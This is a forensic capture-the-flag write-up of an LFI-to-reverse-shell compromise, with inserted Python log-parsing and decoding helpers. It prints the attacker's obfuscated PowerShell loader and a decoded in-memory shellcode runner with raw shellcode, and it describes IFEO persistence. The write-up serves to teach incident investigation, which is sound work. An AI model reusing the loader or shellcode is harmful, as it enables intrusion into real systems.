LFI Escalation Lab Writeup [CyberDefenders]
2026-6-9 08:42:13 Author: infosecwriteups.com (view original) Views: 20

Loay Salah

You can read this writeup on my GitBook account Link

Scenario

IT staff reported unusual behavior on a workstation running a web application, triggered by an antivirus detection of a suspicious file. Early indicators suggest the website may have served as the entry point.

Your task is to investigate the full scope of the compromise — tracing how the attacker gained access, what actions they performed, and how they established persistence on the system.

Reconnaissance

Q1: The threat actor began by probing the web application for hidden or accessible directories.
Which IP address was responsible for this scanning activity?

In the disk image we have the XAMPP access logs, so we need to investigate them:


First, identify the IP address responsible for this scanning activity. We can see one IP address that generated a lot of traffic and tried to access hidden directories:


218.84.168.131

Q2: When was the threat actor’s earliest recorded activity on the compromised website?

Just extract the time when this IP address was first seen, and don't forget to convert the time to UTC, because the log timestamps are in UTC+9:


2025-09-07 08:56

Q3: The threat actor rotated his User-Agent multiple times throughout the attack. How many User-Agents did the threat actor use during the first reconnaissance phase of the attack?

Since he rotated the User-Agents, I was able to list and count the unique User-Agents he used:


13

Initial Access

Q4: A vulnerability was discovered in the old version of the website. How many files were read by the threat actor using the discovered vulnerability?

Now we want to know how many files were read by the threat actor using a vulnerability. The lab is called LFI, so I was expecting to see LFI, and I did. Searching for ../ shows every file the attacker read:


1- system.ini
2- index.php
3- db.php
4- config.php

4
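As an added example (my own code, not part of the original writeup), the following Python script performs the four access-log checks from Q1 to Q4 over a few constructed XAMPP/Apache combined-format lines: it picks the IP with the most error responses (the directory scanner), reports that IP's first request converted from the log's +0900 offset to UTC, counts the User-Agents it used before its first traversal request, and lists the distinct files read through ../ paths (URL-decoded first, so an encoded %2e%2e%2f is not missed, and deduplicated so a file read twice counts once). The scanner IP 218.84.168.131 is the one this writeup identifies; the other IP, the paths, timestamps and User-Agent strings are constructed for the sample.

```python
import re
from collections import Counter
from datetime import datetime, timezone
from posixpath import basename
from urllib.parse import unquote

# Constructed sample of an Apache/XAMPP access.log in combined format with the lab's UTC+9 offset.
# 218.84.168.131 is the scanner IP from the writeup; the other IP, paths, times and User-Agents are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [07/Sep/2025:17:50:02 +0900] "GET /index.php HTTP/1.1" 200 1532 "-" "Mozilla/5.0 (Windows NT 10.0) Firefox/128.0"
218.84.168.131 - - [07/Sep/2025:17:56:14 +0900] "GET /admin/ HTTP/1.1" 404 196 "-" "Mozilla/5.0 (compatible; scanner-A)"
218.84.168.131 - - [07/Sep/2025:17:56:15 +0900] "GET /backup/ HTTP/1.1" 404 196 "-" "Mozilla/5.0 (compatible; scanner-B)"
218.84.168.131 - - [07/Sep/2025:17:56:16 +0900] "GET /.git/ HTTP/1.1" 404 196 "-" "Mozilla/5.0 (compatible; scanner-A)"
218.84.168.131 - - [07/Sep/2025:18:03:40 +0900] "GET /index.php?page=..%2F..%2F..%2F..%2FWindows%2Fsystem.ini HTTP/1.1" 200 219 "-" "curl/8.4.0"
218.84.168.131 - - [07/Sep/2025:18:03:52 +0900] "GET /index.php?page=../config.php HTTP/1.1" 200 310 "-" "curl/8.4.0"
218.84.168.131 - - [07/Sep/2025:18:03:59 +0900] "GET /index.php?page=../config.php HTTP/1.1" 200 310 "-" "curl/8.4.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
TRAVERSAL_RE = re.compile(r'(?:\.\./)+([^\s&"]+)')


def parse_log(text):
    """Parse combined-format lines; timestamps become timezone-aware and are converted to UTC."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # tolerate odd lines instead of aborting the whole parse
        e = m.groupdict()
        e["ts_utc"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z").astimezone(timezone.utc)
        e["status"] = int(e["status"])
        entries.append(e)
    return entries


def top_scanner(entries):
    """IP with the most 4xx/5xx responses: directory brute-forcing leaves a wall of 404s."""
    errors = Counter(e["ip"] for e in entries if e["status"] >= 400)
    return errors.most_common(1)[0][0] if errors else None


def first_seen_utc(entries, ip):
    """Earliest request from `ip`, formatted in UTC (the log itself is written in local time, +0900 here)."""
    times = [e["ts_utc"] for e in entries if e["ip"] == ip]
    return min(times).strftime("%Y-%m-%d %H:%M") if times else None


def traversal_target(path):
    """Name of the file reached through a ../ sequence, or None. URL-decode first so %2e%2e%2f is not missed."""
    m = TRAVERSAL_RE.search(unquote(path))
    return basename(m.group(1)) if m else None


def recon_user_agents(entries, ip):
    """Distinct User-Agents `ip` used before its first traversal request, i.e. during the scanning phase."""
    uas = set()
    for e in entries:
        if e["ip"] != ip:
            continue
        if traversal_target(e["path"]):
            break  # exploitation has started; everything before this is reconnaissance
        uas.add(e["ua"])
    return uas


def lfi_files(entries):
    """Distinct files read through path traversal across the whole log (a file read twice counts once)."""
    return {t for e in entries if (t := traversal_target(e["path"]))}


if __name__ == "__main__":
    log = parse_log(SAMPLE_LOG)
    ip = top_scanner(log)
    print("scanner IP:", ip)
    print("first seen (UTC):", first_seen_utc(log, ip))
    print("recon User-Agents:", len(recon_user_agents(log, ip)))
    print("files read via LFI:", sorted(lfi_files(log)))
```

On the real log the same functions apply unchanged; the only thing to verify first is the timezone offset in the brackets, since the answer format asks for UTC.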

Credential Access

Q5: The threat actor was able to access the MySQL database using credentials from one of the files he accessed earlier. What is the password that the threat actor used to access the MySQL database?

If we read the question carefully, we can see that he accessed the DB with credentials from one of the four files he accessed earlier, which is basically the config.php file. Since there isn't any such file in the xampp directory, it must be in resident data (file content stored inside the MFT record itself). Time to parse the MFT correctly, so let's go.


After parsing the MFT with MFTECmd.exe and getting the entry number of the file, multiply 77932 by 1024 (NTFS MFT record size = 1024 bytes), then go to that offset in HxD (Ctrl+G):


77932 x 1024 = 79,802,368 --> 0x4C1B000 (hex)


Reversing the data from hex for better readability:


Or use MFT Explorer, go to the file path C:\xampp\htdocs\config.php directly, and read the file data there:


IdonknowMayBe2222
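The manual HxD steps above can be scripted. The following Python is an added example of mine, not the writeup's or any tool's code: it computes the record offset for an MFT entry number, applies the NTFS update-sequence fixups (a raw hex view still shows the update sequence number in the last two bytes of each 512-byte sector, which is why the bytes at 0x1FE and 0x3FE of a record can look wrong), walks the record's attributes to pull out the unnamed resident $DATA content, and greps the PHP for a password assignment. The FILE record it parses is built by the script itself as a fixture; the database name and password inside it are the values recovered in this writeup, everything else in the sample config is made up.

```python
from __future__ import annotations

import re
import struct

MFT_RECORD_SIZE = 1024   # NTFS default; confirm from $Boot on other images
SECTOR_SIZE = 512
ATTR_DATA = 0x80
ATTR_END = 0xFFFFFFFF

# Constructed config.php body. DB name and password are the ones the writeup recovered; the rest is made up.
SAMPLE_CONFIG = (b"<?php\n$db_host = 'localhost';\n$db_name = 'vtubermusic';\n"
                 b"$db_user = 'root';\n$db_password = 'IdonknowMayBe2222';\n")


def record_offset(entry_number: int, record_size: int = MFT_RECORD_SIZE) -> int:
    """Byte offset of an MFT entry inside $MFT (the writeup computed this by hand for entry 77932)."""
    return entry_number * record_size


def build_sample_record(content: bytes) -> bytes:
    """Build a minimal FILE record with one unnamed resident $DATA attribute. Test fixture only."""
    rec = bytearray(MFT_RECORD_SIZE)
    rec[0:4] = b"FILE"
    usa_off, usa_cnt = 0x30, 1 + MFT_RECORD_SIZE // SECTOR_SIZE
    struct.pack_into("<HH", rec, 0x04, usa_off, usa_cnt)   # update sequence array offset / count
    first_attr = 0x38
    struct.pack_into("<H", rec, 0x14, first_attr)           # offset to first attribute
    struct.pack_into("<H", rec, 0x16, 0x0001)               # flags: record in use
    content_off = 0x18                                      # resident content follows the 24-byte header
    attr_len = (content_off + len(content) + 7) & ~7        # attributes are 8-byte aligned
    struct.pack_into("<IIBBHHHIH", rec, first_attr,
                     ATTR_DATA, attr_len, 0, 0, 0x18, 0, 0, len(content), content_off)
    rec[first_attr + content_off:first_attr + content_off + len(content)] = content
    struct.pack_into("<I", rec, first_attr + attr_len, ATTR_END)
    struct.pack_into("<I", rec, 0x18, first_attr + attr_len + 8)   # used size of the record
    # Fixups: NTFS overwrites the last 2 bytes of every sector with the USN and stores the originals in the USA.
    usn = b"\x01\x00"
    rec[usa_off:usa_off + 2] = usn
    for i in range(1, usa_cnt):
        end = i * SECTOR_SIZE - 2
        rec[usa_off + 2 * i:usa_off + 2 * i + 2] = rec[end:end + 2]
        rec[end:end + 2] = usn
    return bytes(rec)


def apply_fixups(record: bytes) -> bytearray:
    """Restore the sector-end bytes from the update sequence array; refuse torn records."""
    rec = bytearray(record)
    usa_off, usa_cnt = struct.unpack_from("<HH", rec, 0x04)
    usn = rec[usa_off:usa_off + 2]
    for i in range(1, usa_cnt):
        end = i * SECTOR_SIZE - 2
        if rec[end:end + 2] != usn:
            raise ValueError("fixup mismatch: record is torn or not a 1024-byte FILE record")
        rec[end:end + 2] = rec[usa_off + 2 * i:usa_off + 2 * i + 2]
    return rec


def resident_data(record: bytes) -> bytes | None:
    """Return the content of the unnamed resident $DATA attribute, or None if the data is non-resident.
    Named $DATA streams (alternate data streams) are skipped so only the main file content is returned."""
    if record[0:4] != b"FILE":
        raise ValueError("not a FILE record (expected 'FILE' signature)")
    off = struct.unpack_from("<H", record, 0x14)[0]
    while off + 8 <= len(record):
        atype, alen = struct.unpack_from("<II", record, off)
        if atype == ATTR_END or alen == 0:
            break
        non_resident, name_len = record[off + 8], record[off + 9]
        if atype == ATTR_DATA and non_resident == 0 and name_len == 0:
            clen, coff = struct.unpack_from("<IH", record, off + 0x10)
            return bytes(record[off + coff:off + coff + clen])
        off += alen
    return None


def find_db_password(php_source: bytes) -> str | None:
    """First $...pass... = '...' assignment in the PHP source."""
    m = re.search(rb"\$\w*pass\w*\s*=\s*['\"]([^'\"]*)['\"]", php_source)
    return m.group(1).decode() if m else None


if __name__ == "__main__":
    print(hex(record_offset(77932)))                      # 0x4c1b000
    rec = build_sample_record(SAMPLE_CONFIG)
    data = resident_data(apply_fixups(rec))
    print(find_db_password(data))
```

For the real image, read 1024 bytes at record_offset(77932) from the exported $MFT, pass them through apply_fixups and resident_data; a None result means the file grew past the record and its content lives in clusters referenced by data runs, which this parser deliberately does not follow.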

Q6: When did the threat actor first successfully authenticate to the MySQL database?

Filtering for the POST requests, we get the telltale sequence: a POST request to index.php, a redirect response (302), then the site loading successfully with all files returned (200):


2025-09-07 12:39

Exfiltration

Q7: After authenticating to the MySQL database, the threat actor targeted a specific database for exfiltration. Which database did he access?

Filtering for "db" or "db=" shows the database clearly:


Or from the config.php file that we recovered earlier from the MFT:


vtubermusic

Q8: Which table did the threat actor export from the database?

We can do a double search here: search for db=vtubermusic, then search within that output for table=


users

Execution

Q9: On the next day, the threat actor logged into the MySQL database again using a different IP address. What is this IP address?

The new IP address logged in directly the next day:


182.44.8.254

Q10: The threat actor used SQL commands to create a webshell.
What is the full path of this webshell file on the system?

We can search for cmd= or just scroll a little to find this:


config_old.php

Now we need the full path. We could guess it, but let's confirm it properly:


C:\xampp\htdocs\config_old.php

Q11: The threat actor used a Living-off-the-Land Binary (LOLBin) to hide the webshell. What MITRE ATT&CK technique corresponds to this activity?

T1564.001

Q12: The threat actor executed a command to download a reverse shell payload from a C2 server. What is the domain used to host this payload?

From the access.log file, we can see that a PowerShell command was run:


So let's URL-decode it:


Then decode the Base64-encoded command:


wscryss.xyz

Q13: The reverse shell payload was downloaded to a specific location and executed. What is the full path of this payload?

From the last decoded command in the image above, we can get the answer directly: we know the victim's username from the disk image ("hoshisora"), so the path in the command expands from $env:TEMP\music.exe to C:\users\hoshisora\appdata\local\temp\music.exe.
Note also that music.exe is not found in the MFT, so if we need clearer evidence, we can see it in the prefetch files:


Or from the Amcache hive:


C:\users\hoshisora\appdata\local\temp\music.exe

Privilege Escalation

Q14: After establishing the C2 connection, the threat actor attempted several methods to bypass User Account Control (UAC).
One method used a PowerShell script. What is the name of this script?

Investigating the PowerShell logs, searching for the script extension .ps1:


LykIsnWn.ps1

Q15: The PowerShell script executed shellcode as part of its payload. What is the name of the variable that stores the raw shellcode in the script?

Since it's a PowerShell script, we can investigate the PowerShell Operational log, as it records the actual PowerShell code that executed, including decoded and de-obfuscated script blocks, under Event ID 4104. A quick filter on Event ID 4104 and LykIsnWn.ps1 gives one single event:


Now we have a huge Base64-encoded command; let's decode it:


if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+
'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};
$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;
$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::
create((New-Object System.IO.StreamReader
(New-Object System.IO.Compression.GzipStream
((New-Object System.IO.MemoryStream (,[System.Convert]::FromBase64String
(((''H4sIAMGAvmgCA7VWa4/aOhD9Xqn/''+''IaqQkqhZCA/1LitVuglsgJawsOGxQFHlTQy4m
BgSh4d6+9/vOI+F1bLV{0}is1EsKxZ8bjM8dnMo98lxPmS4dH6ef7d1L6dFGA1pKS2x5K1{0}1N
yu066mkx54YT6bOkTI{0}Nps''+''7WiPizm5taFATY58l7voG5EYZ4/UgJDhVV+kcaLXGAr+4
ef2CXSz+l{0}''+''Pd8g7JHRFOzYw25SyxdGb4n1trMRSKtvLOhhCvyt2+yOr0qzvK{0}2wjRU
JGdY8jxOu9RKqvSL1Vs2D9usCLbxA1YyOY8PyJ+uZQf+CGa4w5E22Eb8yXzQhnOcjpNgHkU+PGh
RJTERpFh2A2Ya{0}hegMNQ1qSpiD+dzf5Wpunm95HPyRrnWz7HAds4ONgRF4f5Jv''+''I9iu/x
fAZeDg+Iv5ipKpjt2AorOT+iVJP+Sxilg/cZdG91Us6dwKrLA1WDir48ps28iOLEUb6QZ0ICFZ6
ECIDeLwHgPKMO+nSBOqeJ7JnGKxjyVbosJLHrZ0nXJBu2RpwFR{0}jN9YMIq7MntKUc9{0}pb7a
{0}RipkrOJIFTEyHjHizk/uz0ucW1VDYvM7jOp4TH9ePPloTN6OqcqkeeE5xDEc+M+tAeoqcLmC
vjileIC4gFrR44X''+''a7JvzJ14wI9XBguFDTELKCcqvPk0mqpsgt{0}8Z''+''rwC55B57m5n
BBcGadXopjtrt4ByO5RlEYalI{0}ghvqapKDEcWeJhl+SNIlI+IsHsqndO2IcuKikGfhZupzNNN
da8wPeRC5UFRAoO9ss''+''EsQFYBoUpN42Dw6ZJHtLl+Eo4YohYsDkXZQD''+''pgRMDhcUCWA
RGNaqHkH89Z6Q/EabGLBsChagDyk1yPmFlpgT76''+''cZ{0}YLEsoLXDJAzrKEYjuUcU0akoCD
+giMxfz/SOGl6ohcagFOK''+''6Nkd2tqH''+''rmgfw65Zv1acDRFKMYj4ICFFbC1iUL8qZJIj
PKhcEe6''+''Bjzjlk9t78uKFFt7+NnwG9jzj22XLLpcZ2vbrYXdhnVtkP1i715{0}DNf74uGq
M6xw57bFa12j2SO6WVm6pt6H8aDFW40WH7eMZn/pUr17uzoUKqFO9s2RiJXE''+''cCuV5oNul
MuVu7K+AvTGpLhYGV5nTfaHNox''+''BS+/aZis09Ra9/VK7fxyVrMmINgsVazkfsdD5NK4XCo
Wqh+r20TBM5pXt40PxnvWb7tqs+KxQrVVWxq1h1PzboW''+''Wyr2MzMLqFIVps2P4rqdLGoma
YlkvwpDewzF7PMo1B48e2Xi0sCtXRA1qao2GJTDYP90t4t/bNnl{0}QKy0PH9h1e0SGOxHL{0}
JrW5AEZ7cnRKhSK47CEViYzTADWmmyNxnK8sboU/PuDEjOGtHOy7TXrX91J8a/Q/vwBKjkdEJ+
XS7McK/9oCql7/y5HymfFfE{0}EbRSES0Shy''+''CDP2VWz''+''WGClittlRHgoCjTtFQ58
TKHRQSvMGGpQylyh9qDM0GcS9RfNaNCKE7o0UqUnQ/XUBLKpm5sJZAicj/mYb2N/wZeafijrOg
i4ftArMbvffrAa2xyVJJomegAA8xSdxtEhIJlLivKnwYIuz0FzXoPrNeRg{0}xUoBChWcnEFfi
Zj9By9+FBPLHgGHWBWhGNPRXuP+QEBrvAWREX0v/N+mtt9r/5JzqTqs4Q/7/ecOc{0}''+''9Z
vVNPNI1Ac2LyecTZ5L9xw4/QoSDnQP6SXHS0S9hkF6Rs8pCUYD+8/QR
H7h{0}Eb/qwCdTrOD/AhBI1txXCwAA'')-f''3'')))),
[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';
$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;
$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;
$p=[System.Diagnostics.Process]::Start($s);

So what's happening here is:

1- Base64 decode the payload
2- Decompress with GZip
3- Read decoded text into memory
4- Create a ScriptBlock
5- Execute it in memory

By following this sequence in reverse, the payload can be decoded by:

1- Extract the encoded payload string
2- Remove string concatenation markers (''+'' → nothing)
3- Replace format placeholders ({0} → 3, as applied by -f '3')
4- Base64-decode the result
5- GZip-decompress the decoded bytes
6- Read the decompressed text
7- Recover the original PowerShell code
➡️ Encoded string → formatted → decoded → decompressed → readable script
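The seven-step recipe above, plus the URL-decode and -EncodedCommand decode used for Q12, written out as an added Python example (my own code, not from the writeup or CyberChef). It does not use the lab's real payload: build_sample_payload creates a fixture in the same shape (gzip, Base64, every 3 replaced by the {0} format placeholder, the string split with ''+'' markers), decode_gzip_payload reverses it exactly as the loader would, and shellcode_variables then finds the [Byte[]] variable that holds the raw shellcode, which is what Q15 asks for. The sample script text and the variable name acBD8 are the only things taken from this page; the decode functions assume the concatenation marker and single format argument the page shows.

```python
from __future__ import annotations

import base64
import gzip
import re
from urllib.parse import quote_plus, unquote_plus

# Constructed stand-in for the decoded script; acBD8 is the variable name from the writeup, the rest is made up.
SAMPLE_SCRIPT = ("[Byte[]]$acBD8 = [System.Convert]::FromBase64String('AAAA')\n"
                 "Write-Output 'constructed sample'")


def build_sample_payload(script: str) -> str:
    """Fixture in the shape of the lab's blob: gzip -> base64 -> '3' swapped for {0} -> ''+'' markers.
    Constructed for the test; not the lab's payload."""
    b64 = base64.b64encode(gzip.compress(script.encode("utf-8"))).decode("ascii")
    chunks = [b64[i:i + 40].replace("3", "{0}") for i in range(0, len(b64), 40)]
    return "''+''".join(chunks)


def decode_gzip_payload(blob: str, format_args=("3",)) -> str:
    """Reverse the loader: drop line wrapping and concatenation markers, apply the -f arguments to the
    {n} placeholders, base64-decode, gunzip, and return the script text."""
    s = re.sub(r"\s+", "", blob)                        # screenshots and logs wrap long lines
    s = s.replace("''+''", "").replace("'+'", "")       # '' is an escaped quote inside a '...' string
    for i, arg in enumerate(format_args):
        s = s.replace("{%d}" % i, arg)                  # what ('...') -f '3' does at run time
    raw = base64.b64decode(s, validate=True)            # validate=True catches a leftover placeholder
    if raw[:2] != b"\x1f\x8b":
        raise ValueError("decoded bytes are not gzip; check the placeholder substitution")
    return gzip.decompress(raw).decode("utf-8")


def build_sample_encoded_command(command: str) -> str:
    """Fixture for the Q12 case: PowerShell -EncodedCommand is base64 over UTF-16LE, URL-encoded in the log."""
    return quote_plus(base64.b64encode(command.encode("utf-16-le")).decode("ascii"))


def decode_encoded_command(log_value: str) -> str:
    """URL-decode the value captured in access.log, then decode the UTF-16LE base64 command."""
    return base64.b64decode(unquote_plus(log_value)).decode("utf-16-le")


def shellcode_variables(script: str) -> list[str]:
    """Variables assigned a [Byte[]] from base64, where this kind of script keeps the raw shellcode."""
    pat = r"\[Byte\[\]\]\s*\$(\w+)\s*=\s*\[System\.Convert\]::FromBase64String"
    return re.findall(pat, script)


if __name__ == "__main__":
    blob = build_sample_payload(SAMPLE_SCRIPT)
    decoded = decode_gzip_payload(blob)
    print(decoded)
    print("shellcode variables:", shellcode_variables(decoded))
```

To run it on the real blob, paste the string between the outer quotes (the one the writeup extracts below) into decode_gzip_payload; the gzip magic check is there because a wrong -f argument or a missed marker produces bytes that base64-decode fine but are not a gzip stream.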

So let's extract the encoded payload string:

H4sIAMGAvmgCA7VWa4/aOhD9Xqn/''+''IaqQkqhZCA/1LitVuglsgJawsOGxQFHlTQy4m
BgSh4d6+9/vOI+F1bLV{0}is1EsKxZ8bjM8dnMo98lxPmS4dH6ef7d1L6dFGA1pKS2x5K1{0}1N
yu066mkx54YT6bOkTI{0}Nps''+''7WiPizm5taFATY58l7voG5EYZ4/UgJDhVV+kcaLXGAr+4
ef2CXSz+l{0}''+''Pd8g7JHRFOzYw25SyxdGb4n1trMRSKtvLOhhCvyt2+yOr0qzvK{0}2wjRU
JGdY8jxOu9RKqvSL1Vs2D9usCLbxA1YyOY8PyJ+uZQf+CGa4w5E22Eb8yXzQhnOcjpNgHkU+PGh
RJTERpFh2A2Ya{0}hegMNQ1qSpiD+dzf5Wpunm95HPyRrnWz7HAds4ONgRF4f5Jv''+''I9iu/x
fAZeDg+Iv5ipKpjt2AorOT+iVJP+Sxilg/cZdG91Us6dwKrLA1WDir48ps28iOLEUb6QZ0ICFZ6
ECIDeLwHgPKMO+nSBOqeJ7JnGKxjyVbosJLHrZ0nXJBu2RpwFR{0}jN9YMIq7MntKUc9{0}pb7a
{0}RipkrOJIFTEyHjHizk/uz0ucW1VDYvM7jOp4TH9ePPloTN6OqcqkeeE5xDEc+M+tAeoqcLmC
vjileIC4gFrR44X''+''a7JvzJ14wI9XBguFDTELKCcqvPk0mqpsgt{0}8Z''+''rwC55B57m5n
BBcGadXopjtrt4ByO5RlEYalI{0}ghvqapKDEcWeJhl+SNIlI+IsHsqndO2IcuKikGfhZupzNNN
da8wPeRC5UFRAoO9ss''+''EsQFYBoUpN42Dw6ZJHtLl+Eo4YohYsDkXZQD''+''pgRMDhcUCWA
RGNaqHkH89Z6Q/EabGLBsChagDyk1yPmFlpgT76''+''cZ{0}YLEsoLXDJAzrKEYjuUcU0akoCD
+giMxfz/SOGl6ohcagFOK''+''6Nkd2tqH''+''rmgfw65Zv1acDRFKMYj4ICFFbC1iUL8qZJIj
PKhcEe6''+''Bjzjlk9t78uKFFt7+NnwG9jzj22XLLpcZ2vbrYXdhnVtkP1i715{0}DNf74uGq
M6xw57bFa12j2SO6WVm6pt6H8aDFW40WH7eMZn/pUr17uzoUKqFO9s2RiJXE''+''cCuV5oNul
MuVu7K+AvTGpLhYGV5nTfaHNox''+''BS+/aZis09Ra9/VK7fxyVrMmINgsVazkfsdD5NK4XCo
Wqh+r20TBM5pXt40PxnvWb7tqs+KxQrVVWxq1h1PzboW''+''Wyr2MzMLqFIVps2P4rqdLGoma
YlkvwpDewzF7PMo1B48e2Xi0sCtXRA1qao2GJTDYP90t4t/bNnl{0}QKy0PH9h1e0SGOxHL{0}
JrW5AEZ7cnRKhSK47CEViYzTADWmmyNxnK8sboU/PuDEjOGtHOy7TXrX91J8a/Q/vwBKjkdEJ+
XS7McK/9oCql7/y5HymfFfE{0}EbRSES0Shy''+''CDP2VWz''+''WGClittlRHgoCjTtFQ58
TKHRQSvMGGpQylyh9qDM0GcS9RfNaNCKE7o0UqUnQ/XUBLKpm5sJZAicj/mYb2N/wZeafijrOg
i4ftArMbvffrAa2xyVJJomegAA8xSdxtEhIJlLivKnwYIuz0FzXoPrNeRg{0}xUoBChWcnEFfi
Zj9By9+FBPLHgGHWBWhGNPRXuP+QEBrvAWREX0v/N+mtt9r/5JzqTqs4Q/7/ecOc{0}''+''9Z
vVNPNI1Ac2LyecTZ5L9xw4/QoSDnQP6SXHS0S9hkF6Rs8pCUYD+8/QR
H7h{0}Eb/qwCdTrOD/AhBI1txXCwAA

With this CyberChef recipe, we can decode all of it perfectly (LINK):


Now, by reading the decoded script below, we can answer easily:

function xb {
Param ($qx28T, $vN)
$csZ = ([AppDomain]::CurrentDomain.GetAssemblies() |
Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')
[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
return $csZ.GetMethod('GetProcAddress',
[Type[]]@([System.Runtime.InteropServices.HandleRef], [String])).
Invoke($null, @([System.Runtime.InteropServices.HandleRef]
(New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr),
($csZ.GetMethod('GetModuleHandle')).Invoke($null, @($qx28T)))), $vN)) }

function a6 {
Param (
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $tdQq,
[Parameter(Position = 1)] [Type] $ig = [Void])
$g9s = [AppDomain]::CurrentDomain.DefineDynamicAssembly
((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),
[System.Reflection.Emit.AssemblyBuilderAccess]::Run).
DefineDynamicModule('InMemoryModule', $false).
DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass,
AutoClass', [System.MulticastDelegate])
$g9s.DefineConstructor('RTSpecialName,HideBySig,
Public', [System.Reflection.CallingConventions]::Standard, $tdQq).
SetImplementationFlags('Runtime, Managed')
$g9s.DefineMethod('Invoke',
'Public, HideBySig, NewSlot, Virtual', $ig, $tdQq).
SetImplementationFlags('Runtime, Managed')
return $g9s.CreateType() }

[Byte[]]$acBD8 = [System.Convert]::FromBase64String("/OiPAAAAYInlMd
Jki1Iwi1IMi1IUMf+LcigPt0omMcCsPGF8Aiwgwc8NAcdJde9SV4tSEItCPAHQi0B4hcB
0TAHQUItIGItYIAHThcl0PEkx/4s0iwHWMcCswc8NAcc44HX0A334O30kdeBYi1gkAdNm
iwxLi1gcAdOLBIsB0IlEJCRbW2FZWlH/4FhfWosS6YD///
9daDMyAABod3MyX1RoTHcmB4no/9C4kAEAACnEVFBoKYBrAP/
VagpowKi9lGgCABFcieZQUFBQQFBAUGjqD9/g/9WXahBWV2iZpXRh/9WFwHQM
/04Idexo8LWiVv/VagBqBFZXaALZyF// 1Ys2akBoABAAAFZqAGhYpFPl/
9WTU2oAVlNXaALZyF//1QHDKcZ17sM=")
[Uint32]$o3jH = 0
$i3 = [System.Runtime.InteropServices.Marshal]::
GetDelegateForFunctionPointer((xb kernel32.dll VirtualAlloc),
(a6 @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).
Invoke([IntPtr]::Zero, $acBD8.Length,0x3000, 0x04)

[System.Runtime.InteropServices.Marshal]::
Copy($acBD8, 0, $i3, $acBD8.length)
if (([System.Runtime.InteropServices.Marshal]::
GetDelegateForFunctionPointer ((xb kernel32.dll VirtualProtect),
(a6 @([IntPtr], [UIntPtr], [UInt32], [UInt32].MakeByRefType())
([Bool]))).Invoke($i3, [Uint32]
$acBD8.Length,0x10,[Ref]$o3jH)) -eq $true) {
$v_9 = [System.Runtime.InteropServices.Marshal]::
GetDelegateForFunctionPointer((xb kernel32.dll CreateThread),
(a6 @([IntPtr] ,[UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr])
([IntPtr]))). Invoke([IntPtr]::Zero,0,
$i3,[IntPtr]::Zero,0,[IntPtr]::Zero)
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer
((xb kernel32.dll WaitForSingleObject), (a6 @([IntPtr], [Int32]))).
Invoke($v_9,0xffffffff) | Out-Null }

acBD8

Q16: After failing to bypass UAC, the threat actor downloaded another binary to authenticate as the compromised user.
What is the original filename of this binary?

According to the question, the attacker downloaded and executed another binary for authentication. Therefore, by filtering Event ID 4624 (successful logon), we can review the associated logon events and identify the processes and files involved during the authentication activity.

Filtered on Event ID 4624 and focused on the user hoshisora (the victim):


We found a suspicious binary, so this one needs deeper investigation.
The r.exe file was not found in the MFT, so I used NTFS Log Tracker with $MFT, $LogFile and $J, but there was nothing!! So the only option left is the Amcache hive:


After parsing the Amcache with AmcacheParser.exe, we get the SHA1 hash of the r.exe file, and using VirusTotal we can get the original filename:


RunasCs.exe

Q17: What is the SHA-256 hash of the reverse-shell payload the threat actor uploaded and used with the previously identified binary?

Soooo!! This question is hard to answer directly without completing the other questions; it's related to Q19 & Q20 in the Persistence section.
Reading the challenge description might also help. Anyway, let's dig more.
Investigating the Windows Defender logs, we can see a file that Defender caught as malware and flagged as a Trojan/Meterpreter reverse shell:


So we can get the hash from the MPLog-*.log file:


087e9494deb843bf6c1f9284697658cb06ac1ac537c1b738ec3bc80f24f32731

Persistence

Q18: Which MITRE ATT&CK technique did the threat actor use to establish persistence through registry modifications that execute a payload upon a program’s silent termination?


T1546.012

Q19: Which program was configured to monitor and execute the threat actor’s payload as part of his persistence mechanism?

The technique used to establish persistence by executing a payload when a process exits silently is: T1546.012

This is a sub-technique of Event Triggered Execution (T1546), specifically Image File Execution Options (IFEO) Injection via the SilentProcessExit mechanism.

The attacker typically modifies the registry key: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\
So let's investigate it:


Notepad
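The registry check from Q18 and Q19, as an added example in Python (my own code, not the writeup's). It parses a .reg export of the kind `reg export` produces and pairs every SilentProcessExit\<image> entry that names a MonitorProcess with the matching Image File Execution Options\<image> key, because the hook only fires when that key's GlobalFlag has bit 0x200 (FLG_MONITOR_SILENT_PROCESS_EXIT) set and ReportingMode has bit 0x1 (launch the monitor process). The export is constructed: notepad.exe is the monitored program and spoolsc.exe the persistence binary from this writeup, the path of spoolsc.exe is a placeholder since the page does not give it, and the calc.exe entry is a benign IFEO key added to show that not every IFEO entry is a finding.

```python
IFEO = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"
SPE = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit"
FLG_MONITOR_SILENT_PROCESS_EXIT = 0x200   # GlobalFlag bit that arms SilentProcessExit for the image
LAUNCH_MONITOR_PROCESS = 0x1              # ReportingMode bit: start MonitorProcess on silent exit

# Constructed .reg export; NOT a dump from the lab image. The spoolsc.exe path is a placeholder.
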